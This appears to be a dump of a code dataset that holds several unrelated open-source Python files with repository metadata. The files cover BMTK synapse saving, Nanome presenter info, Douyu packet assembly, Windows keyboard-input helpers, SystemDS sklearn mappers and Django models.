cls = TestGlobalEnergyValues()
cls.setUp()
cls.test_03_check_net_production_values()
print(f'Time : {time.time() - t0} s')
| 47.680769 | 304 | 0.638239 | 49,047 | 0.98909 | 0 | 0 | 0 | 0 | 0 | 0 | 28,559 | 0.575926 |
396aa7d766efce4140f100be9476c86629b27ef9 | 11,383 | py | Python | bmtk/simulator/bionet/modules/save_synapses.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | [
"BSD-3-Clause"
] | 1 | 2019-03-27T12:23:09.000Z | 2019-03-27T12:23:09.000Z | bmtk/simulator/bionet/modules/save_synapses.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | [
"BSD-3-Clause"
] | null | null | null | bmtk/simulator/bionet/modules/save_synapses.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | [
"BSD-3-Clause"
] | null | null | null | import os
import csv
import h5py
import numpy as np
from neuron import h
from .sim_module import SimulatorMod
from bmtk.simulator.bionet.biocell import BioCell
from bmtk.simulator.bionet.io_tools import io
from bmtk.simulator.bionet.pointprocesscell import PointProcessCell
pc = h.ParallelContext()
MPI_RANK = int(pc.id())
N_HOSTS = int(pc.nhost())
class SaveSynapses(SimulatorMod):
def __init__(self, network_dir, single_file=False, **params):
self._network_dir = network_dir
self._virt_lookup = {}
self._gid_lookup = {}
self._sec_lookup = {}
if not os.path.exists(network_dir):
os.makedirs(network_dir)
if N_HOSTS > 1:
io.log_exception('save_synapses module is not current supported with mpi')
self._syn_writer = ConnectionWriter(network_dir)
def _print_nc(self, nc, src_nid, trg_nid, cell, src_pop, trg_pop, edge_type_id):
if isinstance(cell, BioCell):
sec_x = nc.postloc()
sec = h.cas()
sec_id = self._sec_lookup[cell.gid][sec] #cell.get_section_id(sec)
h.pop_section()
self._syn_writer.add_bio_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0], sec_id, sec_x)
# print '{} ({}) <-- {} ({}), {}, {}, {}, {}'.format(trg_nid, trg_pop, src_nid, src_pop, nc.weight[0], nc.delay, sec_id, sec_x)
else:
self._syn_writer.add_point_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0])
#print '{} ({}) <-- {} ({}), {}, {}'.format(trg_nid, trg_pop, src_nid, src_pop, nc.weight[0], nc.delay)
def initialize(self, sim):
io.log_info('Saving network connections. This may take a while.')
# Need a way to look up virtual nodes from nc.pre()
for pop_name, nodes_table in sim.net._virtual_nodes.items():
for node_id, virt_node in nodes_table.items():
self._virt_lookup[virt_node.hobj] = (pop_name, node_id)
# Need to figure out node_id and pop_name from nc.srcgid()
for node_pop in sim.net.node_populations:
pop_name = node_pop.name
for node in node_pop[0::1]:
if node.model_type != 'virtual':
self._gid_lookup[node.gid] = (pop_name, node.node_id)
for gid, cell in sim.net.get_local_cells().items():
trg_pop, trg_id = self._gid_lookup[gid]
if isinstance(cell, BioCell):
#from pprint import pprint
#pprint({i: s_name for i, s_name in enumerate(cell.get_sections())})
#exit()
# sections = cell._syn_seg_ix
self._sec_lookup[gid] = {sec_name: sec_id for sec_id, sec_name in enumerate(cell.get_sections_id())}
else:
sections = [-1]*len(cell.netcons)
for nc, edge_type_id in zip(cell.netcons, cell._edge_type_ids):
src_gid = int(nc.srcgid())
if src_gid == -1:
# source is a virtual node
src_pop, src_id = self._virt_lookup[nc.pre()]
else:
src_pop, src_id = self._gid_lookup[src_gid]
self._print_nc(nc, src_id, trg_id, cell, src_pop, trg_pop, edge_type_id)
self._syn_writer.close()
io.log_info(' Done saving network connections.')
class ConnectionWriter(object):
class H5Index(object):
def __init__(self, network_dir, src_pop, trg_pop):
# TODO: Merge with NetworkBuilder code for building SONATA files
self._nsyns = 0
self._n_biosyns = 0
self._n_pointsyns = 0
self._block_size = 5
self._pop_name = '{}_{}'.format(src_pop, trg_pop)
self._h5_file = h5py.File(os.path.join(network_dir, '{}_edges.h5'.format(self._pop_name)), 'w')
self._pop_root = self._h5_file.create_group('/edges/{}'.format(self._pop_name))
self._pop_root.create_dataset('edge_group_id', (self._block_size, ), dtype=np.uint16,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('source_node_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root['source_node_id'].attrs['node_population'] = src_pop
self._pop_root.create_dataset('target_node_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root['target_node_id'].attrs['node_population'] = trg_pop
self._pop_root.create_dataset('edge_type_id', (self._block_size, ), dtype=np.uint32,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('0/syn_weight', (self._block_size, ), dtype=np.float,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('0/sec_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('0/sec_x', (self._block_size, ), chunks=(self._block_size, ),
maxshape=(None, ), dtype=np.float)
self._pop_root.create_dataset('1/syn_weight', (self._block_size, ), dtype=np.float,
chunks=(self._block_size, ), maxshape=(None, ))
def _add_conn(self, edge_type_id, src_id, trg_id, grp_id):
self._pop_root['edge_type_id'][self._nsyns] = edge_type_id
self._pop_root['source_node_id'][self._nsyns] = src_id
self._pop_root['target_node_id'][self._nsyns] = trg_id
self._pop_root['edge_group_id'][self._nsyns] = grp_id
self._nsyns += 1
if self._nsyns % self._block_size == 0:
self._pop_root['edge_type_id'].resize((self._nsyns + self._block_size,))
self._pop_root['source_node_id'].resize((self._nsyns + self._block_size, ))
self._pop_root['target_node_id'].resize((self._nsyns + self._block_size, ))
self._pop_root['edge_group_id'].resize((self._nsyns + self._block_size, ))
def add_bio_conn(self, edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x):
self._add_conn(edge_type_id, src_id, trg_id, 0)
self._pop_root['0/syn_weight'][self._n_biosyns] = syn_weight
self._pop_root['0/sec_id'][self._n_biosyns] = sec_id
self._pop_root['0/sec_x'][self._n_biosyns] = sec_x
self._n_biosyns += 1
if self._n_biosyns % self._block_size == 0:
self._pop_root['0/syn_weight'].resize((self._n_biosyns + self._block_size, ))
self._pop_root['0/sec_id'].resize((self._n_biosyns + self._block_size, ))
self._pop_root['0/sec_x'].resize((self._n_biosyns + self._block_size, ))
def add_point_conn(self, edge_type_id, src_id, trg_id, syn_weight):
self._add_conn(edge_type_id, src_id, trg_id, 1)
self._pop_root['1/syn_weight'][self._n_pointsyns] = syn_weight
self._n_pointsyns += 1
if self._n_pointsyns % self._block_size == 0:
self._pop_root['1/syn_weight'].resize((self._n_pointsyns + self._block_size, ))
def clean_ends(self):
self._pop_root['source_node_id'].resize((self._nsyns,))
self._pop_root['target_node_id'].resize((self._nsyns,))
self._pop_root['edge_group_id'].resize((self._nsyns,))
self._pop_root['edge_type_id'].resize((self._nsyns,))
self._pop_root['0/syn_weight'].resize((self._n_biosyns,))
self._pop_root['0/sec_id'].resize((self._n_biosyns,))
self._pop_root['0/sec_x'].resize((self._n_biosyns,))
self._pop_root['1/syn_weight'].resize((self._n_pointsyns,))
eg_ds = self._pop_root.create_dataset('edge_group_index', (self._nsyns, ), dtype=np.uint64)
bio_count, point_count = 0, 0
for idx, grp_id in enumerate(self._pop_root['edge_group_id']):
if grp_id == 0:
eg_ds[idx] = bio_count
bio_count += 1
elif grp_id == 1:
eg_ds[idx] = point_count
point_count += 1
self._create_index('target')
def _create_index(self, index_type='target'):
if index_type == 'target':
edge_nodes = np.array(self._pop_root['target_node_id'], dtype=np.int64)
output_grp = self._pop_root.create_group('indicies/target_to_source')
elif index_type == 'source':
edge_nodes = np.array(self._pop_root['source_node_id'], dtype=np.int64)
output_grp = self._pop_root.create_group('indicies/source_to_target')
edge_nodes = np.append(edge_nodes, [-1])
n_targets = np.max(edge_nodes)
ranges_list = [[] for _ in xrange(n_targets + 1)]
n_ranges = 0
begin_index = 0
cur_trg = edge_nodes[begin_index]
for end_index, trg_gid in enumerate(edge_nodes):
if cur_trg != trg_gid:
ranges_list[cur_trg].append((begin_index, end_index))
cur_trg = int(trg_gid)
begin_index = end_index
n_ranges += 1
node_id_to_range = np.zeros((n_targets + 1, 2))
range_to_edge_id = np.zeros((n_ranges, 2))
range_index = 0
for node_index, trg_ranges in enumerate(ranges_list):
if len(trg_ranges) > 0:
node_id_to_range[node_index, 0] = range_index
for r in trg_ranges:
range_to_edge_id[range_index, :] = r
range_index += 1
node_id_to_range[node_index, 1] = range_index
output_grp.create_dataset('range_to_edge_id', data=range_to_edge_id, dtype='uint64')
output_grp.create_dataset('node_id_to_range', data=node_id_to_range, dtype='uint64')
def __init__(self, network_dir):
self._network_dir = network_dir
self._pop_groups = {}
def _group_key(self, src_pop, trg_pop):
return (src_pop, trg_pop)
def _get_edge_group(self, src_pop, trg_pop):
grp_key = self._group_key(src_pop, trg_pop)
if grp_key not in self._pop_groups:
self._pop_groups[grp_key] = self.H5Index(self._network_dir, src_pop, trg_pop)
return self._pop_groups[grp_key]
def add_bio_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight, sec_id, sec_x):
h5_grp = self._get_edge_group(src_pop, trg_pop)
h5_grp.add_bio_conn(edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x)
def add_point_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight):
h5_grp = self._get_edge_group(src_pop, trg_pop)
h5_grp.add_point_conn(edge_type_id, src_id, trg_id, syn_weight)
def close(self):
for _, h5index in self._pop_groups.items():
h5index.clean_ends()
| 48.233051 | 139 | 0.598876 | 11,025 | 0.96855 | 0 | 0 | 0 | 0 | 0 | 0 | 1,474 | 0.129491 |
396b128eaea90d279b0b41fb297fa2fa82ed6d87 | 1,930 | py | Python | nanome/api/user/presenter_info.py | nanome-ai/nanome-plugin-api | f2ce6a5e3123ee7449a90c2659f3891124289f4a | [
"MIT"
] | 3 | 2020-07-02T13:08:27.000Z | 2021-11-24T14:32:53.000Z | nanome/api/user/presenter_info.py | nanome-ai/nanome-plugin-api | f2ce6a5e3123ee7449a90c2659f3891124289f4a | [
"MIT"
] | 11 | 2020-09-14T17:01:47.000Z | 2022-02-18T04:00:52.000Z | nanome/api/user/presenter_info.py | nanome-ai/nanome-plugin-api | f2ce6a5e3123ee7449a90c2659f3891124289f4a | [
"MIT"
] | 5 | 2020-08-12T16:30:03.000Z | 2021-12-06T18:04:23.000Z | class PresenterInfo():
"""
| Class to fetch information about the current nanome session's presenter.
"""
def __init__(self):
self._account_id = ""
self._account_name = ""
self._account_email = ""
self._has_org = False
self._org_id = 0
self._org_name = ""
@property
def account_id(self):
"""
| The Nanome account ID of the presenter
:type: :class:`str`
"""
return self._account_id
@account_id.setter
def account_id(self, value):
self._account_id = value
@property
def account_name(self):
"""
| The Nanome account name of the presenter
:type: :class:`str`
"""
return self._account_name
@account_name.setter
def account_name(self, value):
self._account_name = value
@property
def account_email(self):
"""
| The Nanome account email of the presenter
:type: :class:`str`
"""
return self._account_email
@account_email.setter
def account_email(self, value):
self._account_email = value
@property
def has_org(self):
"""
| If the presenter belongs to an organization
:type: :class:`bool`
"""
return self._has_org
@has_org.setter
def has_org(self, value):
self._has_org = value
@property
def org_id(self):
"""
| The ID of the organization the presenter belongs to
:type: :class:`int`
"""
return self._org_id
@org_id.setter
def org_id(self, value):
self._org_id = value
@property
def org_name(self):
"""
| The name of the organization the presenter belongs to
:type: :class:`str`
"""
return self._org_name
@org_name.setter
def org_name(self, value):
self._org_name = value
| 21.208791 | 78 | 0.564249 | 1,929 | 0.999482 | 0 | 0 | 1,537 | 0.796373 | 0 | 0 | 695 | 0.360104 |
396be9b8e76a36fa6d51ae0f674f69f4c1dcf376 | 1,217 | py | Python | pydouyu/packet_util.py | Kexiii/pydouyu | 494732159980b7b71575e6757899c48052c6c2e0 | [
"MIT"
] | 11 | 2019-02-22T01:02:32.000Z | 2021-12-15T08:50:26.000Z | pydouyu/packet_util.py | Kexiii/pydouyu | 494732159980b7b71575e6757899c48052c6c2e0 | [
"MIT"
] | 2 | 2020-07-05T01:26:18.000Z | 2021-01-07T15:22:57.000Z | pydouyu/packet_util.py | Kexiii/pydouyu | 494732159980b7b71575e6757899c48052c6c2e0 | [
"MIT"
] | 3 | 2019-04-23T01:22:20.000Z | 2021-12-04T09:09:16.000Z | import time
client_msg_type = 689
reserved_data_field = 0
def assemble_login_str(room_id):
res = "type@=loginreq/roomid@=" + str(room_id) + "/"
return res
def assemble_join_group_str(room_id):
res = "type@=joingroup/rid@=" + str(room_id) + "/gid@=-9999/";
return res
def assemble_heartbeat_str():
res = "type@=keeplive/tick@=%s/" % int(time.time()) + "/"
return res
def assemble_transfer_data(ori_str):
data_size = len(ori_str)
packet_size = 4 * 2 + data_size + 1;
data = packet_size.to_bytes(4, byteorder='little')
data += packet_size.to_bytes(4, byteorder='little')
data += client_msg_type.to_bytes(2, byteorder='little')
data += reserved_data_field.to_bytes(2, byteorder='little')
data += ori_str.encode()
data += b'\0'
return data
def extract_str_from_data(data):
packet_size = int.from_bytes(data[0:4], byteorder='little')
if packet_size != len(data):
return ""
return data[8:].decode("utf8", "ignore")
def parse_str_to_dict(ori_str):
res = {}
ori_strs = ori_str.split("/");
for ori_str in ori_strs:
kv = ori_str.split("@=")
if len(kv) == 2:
res[kv[0]] = kv[1]
return res
| 23.403846 | 66 | 0.632703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 162 | 0.133114 |
396d4f672042b6ba26b0ebbbfccf8610a433735a | 2,976 | py | Python | scripts/staging/sklearn/mappers/supervised.py | mgd-hin/systemds | 08944a7305cbc4f4d9cbbd4565efa8bcc93b82e3 | [
"Apache-2.0"
] | 372 | 2017-06-09T01:02:53.000Z | 2020-06-24T05:45:00.000Z | scripts/staging/sklearn/mappers/supervised.py | ywcb00/systemds | 5cc523971854cdf4f22e6199987a86e213fae4e2 | [
"Apache-2.0"
] | 418 | 2017-06-08T16:27:44.000Z | 2020-06-25T12:15:54.000Z | scripts/staging/sklearn/mappers/supervised.py | ywcb00/systemds | 5cc523971854cdf4f22e6199987a86e213fae4e2 | [
"Apache-2.0"
] | 190 | 2017-06-08T19:32:54.000Z | 2020-06-15T12:26:12.000Z | # -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
from .mapper import Mapper
class LinearSVMMapper(Mapper):
name = 'l2svm'
sklearn_name = 'linearsvc'
is_supervised = True
mapped_output = [
'model'
]
def map_params(self):
self.mapped_params = [
'TRUE' if self.params.get('fit_intercept', False) else 'FALSE',
self.params.get('tol', 0.001),
self.params.get('C', 1.0),
self.params.get('max_iter', 100),
20, # maxii parameter is unkown in sklearn and not documented in dml
'TRUE' if self.params.get('verbose', False) else 'FALSE',
-1 # column_id is unkown in sklearn
]
class TweedieRegressorMapper(Mapper):
name = 'glm'
sklearn_name = 'tweedieregressor'
is_supervised = True
mapped_output = [
'beta'
]
def map_params(self):
# TODO: many parameters cannot be mapped directly:
# how to handle defaults for dml?
self.mapped_params = [
1, # sklearn impl supports power only, dfam
self.params.get('power', 0.0), # vpow
0, # link
1.0, # lpow
0.0, # yneg
# sklearn does not know last case
0 if self.params.get('fit_intercept', 1) else 1, # icpt
0.0, # disp
0.0, # reg
self.params.get('tol', 0.000001), # tol
200, # moi
0, # mii,
'TRUE' if self.params.get('verbose', False) else 'FALSE'
]
class LogisticRegressionMapper(Mapper):
name = 'multiLogReg'
sklearn_name = 'logisticregression'
is_supervised = True
mapped_output = [
'beta'
]
def map_params(self):
self.mapped_params = [
# sklearn does not know last case
0 if self.params.get('fit_intercept', 1) else 1,
self.params.get('tol', 0.000001), # tol
self.params.get('C', 0.0), # reg
100, # maxi
0, # maxii
'TRUE' if self.params.get('verbose', False) else 'FALSE'
]
| 33.438202 | 80 | 0.576277 | 2,024 | 0.680108 | 0 | 0 | 0 | 0 | 0 | 0 | 1,517 | 0.509745 |
396e8a1e3e6aa7c66751f496564ba6b53523d4aa | 43 | py | Python | homemade_steganog/__init__.py | zoomie/homemade_steganog | 1ab0a140b6a2e0d9d36073d067a2c808c97adf38 | [
"MIT"
] | 1 | 2019-03-12T13:25:43.000Z | 2019-03-12T13:25:43.000Z | homemade_steganog/__init__.py | zoomie/homemade_encryption | 1ab0a140b6a2e0d9d36073d067a2c808c97adf38 | [
"MIT"
] | 4 | 2020-03-24T16:43:01.000Z | 2022-03-11T23:39:53.000Z | homemade_steganog/__init__.py | zoomie/homemade_encryption | 1ab0a140b6a2e0d9d36073d067a2c808c97adf38 | [
"MIT"
] | null | null | null | from .home import Steg
__all__ = ['Steg',] | 14.333333 | 22 | 0.674419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 | 0.139535 |
396fa59895ef035568d0b517a96fd649c4c2ec84 | 4,364 | py | Python | xyw_macro/win32.py | xue0228/keyboard | dcb0def1d87a9197676c0f405b980a67e128ab24 | [
"MIT"
] | null | null | null | xyw_macro/win32.py | xue0228/keyboard | dcb0def1d87a9197676c0f405b980a67e128ab24 | [
"MIT"
] | null | null | null | xyw_macro/win32.py | xue0228/keyboard | dcb0def1d87a9197676c0f405b980a67e128ab24 | [
"MIT"
] | null | null | null | import ctypes
from ctypes import wintypes, windll
import win32api
import win32con
import win32gui
# PUL = ctypes.POINTER(ctypes.c_ulong)
PUL = ctypes.c_void_p
class KeyBdMsg(ctypes.Structure):
"""
键盘回调函数用结构体
"""
_fields_ = [
('vkCode', wintypes.DWORD),
('scanCode', wintypes.DWORD),
('flags', wintypes.DWORD),
('time', wintypes.DWORD),
('dwExtraInfo', PUL)]
class KeyBdInput(ctypes.Structure):
"""
键盘输入用结构体
"""
EXTENDEDKEY = 0x0001
KEYUP = 0x0002
SCANCODE = 0x0008
UNICODE = 0x0004
_fields_ = [("wVk", ctypes.c_ushort),
("wScan", ctypes.c_ushort),
("dwFlags", ctypes.c_ulong),
("time", ctypes.c_ulong),
("dwExtraInfo", PUL)]
class HardwareInput(ctypes.Structure):
"""
硬件输入用结构体
"""
_fields_ = [("uMsg", ctypes.c_ulong),
("wParamL", ctypes.c_short),
("wParamH", ctypes.c_ushort)]
class MouseInput(ctypes.Structure):
"""
鼠标输入用结构体
"""
MOVE = 0x0001
LEFTDOWN = 0x0002
LEFTUP = 0x0004
RIGHTDOWN = 0x0008
RIGHTUP = 0x0010
MIDDLEDOWN = 0x0020
MIDDLEUP = 0x0040
XDOWN = 0x0080
XUP = 0x0100
WHEEL = 0x0800
HWHEEL = 0x1000
ABSOLUTE = 0x8000
XBUTTON1 = 0x0001
XBUTTON2 = 0x0002
_fields_ = [("dx", ctypes.c_long),
("dy", ctypes.c_long),
("mouseData", ctypes.c_ulong),
("dwFlags", ctypes.c_ulong),
("time", ctypes.c_ulong),
("dwExtraInfo", PUL)]
class InputUnion(ctypes.Union):
_fields_ = [("ki", KeyBdInput),
("mi", MouseInput),
("hi", HardwareInput)]
class Input(ctypes.Structure):
"""
SendInput函数用最终结构体
"""
MOUSE = 0
KEYBOARD = 1
HARDWARE = 2
_fields_ = [("type", ctypes.c_ulong),
("ii", InputUnion)]
# 键盘事件用回调函数
HookProc = ctypes.WINFUNCTYPE(
wintypes.LPARAM,
ctypes.c_int32, wintypes.WPARAM, ctypes.POINTER(KeyBdMsg))
# 消息队列发送函数
SendInput = windll.user32.SendInput
SendInput.argtypes = (
wintypes.UINT,
ctypes.POINTER(Input),
ctypes.c_int)
# 获取并阻断消息队列
GetMessage = windll.user32.GetMessageA
GetMessage.argtypes = (
wintypes.MSG,
wintypes.HWND,
wintypes.UINT,
wintypes.UINT)
# 设置回调函数
SetWindowsHookEx = windll.user32.SetWindowsHookExA
SetWindowsHookEx.argtypes = (
ctypes.c_int,
HookProc,
wintypes.HINSTANCE,
wintypes.DWORD)
# 解除回调函数
UnhookWindowsHookEx = windll.user32.UnhookWindowsHookEx
UnhookWindowsHookEx.argtypes = (
wintypes.HHOOK,)
# 将消息传递到钩子链下一函数
CallNextHookEx = windll.user32.CallNextHookEx
CallNextHookEx.argtypes = (
wintypes.HHOOK,
ctypes.c_int,
wintypes.WPARAM,
KeyBdMsg)
GetAsyncKeyState = windll.user32.GetAsyncKeyState
GetAsyncKeyState.argtypes = (
ctypes.c_int,
)
GetMessageExtraInfo = windll.user32.GetMessageExtraInfo
SetMessageExtraInfo = windll.user32.SetMessageExtraInfo
SetMessageExtraInfo.argtypes = (
wintypes.LPARAM,
)
def send_kb_event(v_key, is_pressed):
"""
向消息队列发送键盘输入,指定dwExtraInfo为228,便于回调函数过滤此部分键盘输入
:param v_key: 虚拟键号
:param is_pressed: 是否按下
:return:
"""
extra = 228
li = InputUnion()
flag = KeyBdInput.KEYUP if not is_pressed else 0
li.ki = KeyBdInput(v_key, 0x48, flag, 0, extra)
input = Input(Input.KEYBOARD, li)
return SendInput(1, ctypes.pointer(input), ctypes.sizeof(input))
def send_unicode(unicode):
extra = 228
li = InputUnion()
flag = KeyBdInput.UNICODE
li.ki = KeyBdInput(0, ord(unicode), flag, 0, extra)
input = Input(Input.KEYBOARD, li)
return SendInput(1, ctypes.pointer(input), ctypes.sizeof(input))
def change_language_layout(language):
hwnd = win32gui.GetForegroundWindow()
im_list = win32api.GetKeyboardLayoutList()
im_list = list(map(hex, im_list))
# print(im_list)
if hex(language) not in im_list:
win32api.LoadKeyboardLayout('0000' + hex(language)[-4:], 1)
im_list = win32api.GetKeyboardLayoutList()
im_list = list(map(hex, im_list))
if hex(language) not in im_list:
return False
result = win32api.SendMessage(
hwnd,
win32con.WM_INPUTLANGCHANGEREQUEST,
0,
language)
return result == 0
| 21.82 | 68 | 0.632676 | 1,845 | 0.39866 | 0 | 0 | 0 | 0 | 0 | 0 | 820 | 0.177182 |
397163cbc30071660c1df03a91c22f9cdffa46d3 | 496 | py | Python | helpdesk/simple/views.py | fratoj/helpdesk | 302c41491f26432bd65e468f015cdb123a47bcad | [
"MIT"
] | null | null | null | helpdesk/simple/views.py | fratoj/helpdesk | 302c41491f26432bd65e468f015cdb123a47bcad | [
"MIT"
] | 4 | 2021-04-08T21:51:21.000Z | 2021-06-10T20:21:24.000Z | helpdesk/simple/views.py | fratoj/helpdesk | 302c41491f26432bd65e468f015cdb123a47bcad | [
"MIT"
] | null | null | null | from django.shortcuts import render
import numpy as np
def index(request):
return render(request, 'simple/index.html')
def room(request, room_name):
safe = np.random.normal(size=20, loc=0, scale=1)
return render(request, 'simple/room.html', {
'room_name': room_name,
'some_thing': {
'yolo': 'fish',
'test': [1,2,3],
},
'stay': safe.tolist()
})
def question(request):
return render(request, 'simple/question.html')
| 21.565217 | 52 | 0.59879 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 106 | 0.21371 |
397474e797b04315ff3ee3188dba1be27f9df132 | 752 | py | Python | fullthrottleapp/models.py | Pranjali16/FullThrottle-Project | bb6fbd3783d22c2e47ad85687e18f02a30c69799 | [
"Apache-2.0"
] | null | null | null | fullthrottleapp/models.py | Pranjali16/FullThrottle-Project | bb6fbd3783d22c2e47ad85687e18f02a30c69799 | [
"Apache-2.0"
] | null | null | null | fullthrottleapp/models.py | Pranjali16/FullThrottle-Project | bb6fbd3783d22c2e47ad85687e18f02a30c69799 | [
"Apache-2.0"
] | null | null | null | from django.db import models
from django.contrib.auth.models import AbstractBaseUser
class User(AbstractBaseUser, models.Model):
"""User Model"""
name = models.CharField(max_length=500, blank=True, null=True)
tz = models.CharField(max_length=500, blank=True, null=True)
USERNAME_FIELD = 'name'
def __str__(self):
return str(self.name)
class ActivityPeriod(models.Model):
""" Activity Period Model"""
user_id = models.ForeignKey(User, related_name='user_activity', null=True, blank=True,
on_delete=models.CASCADE)
start_time = models.CharField(max_length=500, blank=True, null=True)
end_time = models.CharField(max_length=500, blank=True, null=True)
| 34.181818 | 91 | 0.679521 | 653 | 0.868351 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.086436 |
3974ecf545e9249007cc970e291df529ea220e8f | 83 | py | Python | devind_helpers/validator/__init__.py | devind-team/devind-django-helpers | 5c64d46a12802bbe0b70e44aa9d19bf975511b6e | [
"MIT"
] | null | null | null | devind_helpers/validator/__init__.py | devind-team/devind-django-helpers | 5c64d46a12802bbe0b70e44aa9d19bf975511b6e | [
"MIT"
] | 4 | 2022-02-18T09:24:05.000Z | 2022-03-31T16:46:29.000Z | devind_helpers/validator/__init__.py | devind-team/devind-django-helpers | 5c64d46a12802bbe0b70e44aa9d19bf975511b6e | [
"MIT"
] | null | null | null | from .validators import Validator, BaseRule
__all__ = ('Validator', 'BaseRule',)
| 16.6 | 43 | 0.73494 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 21 | 0.253012 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.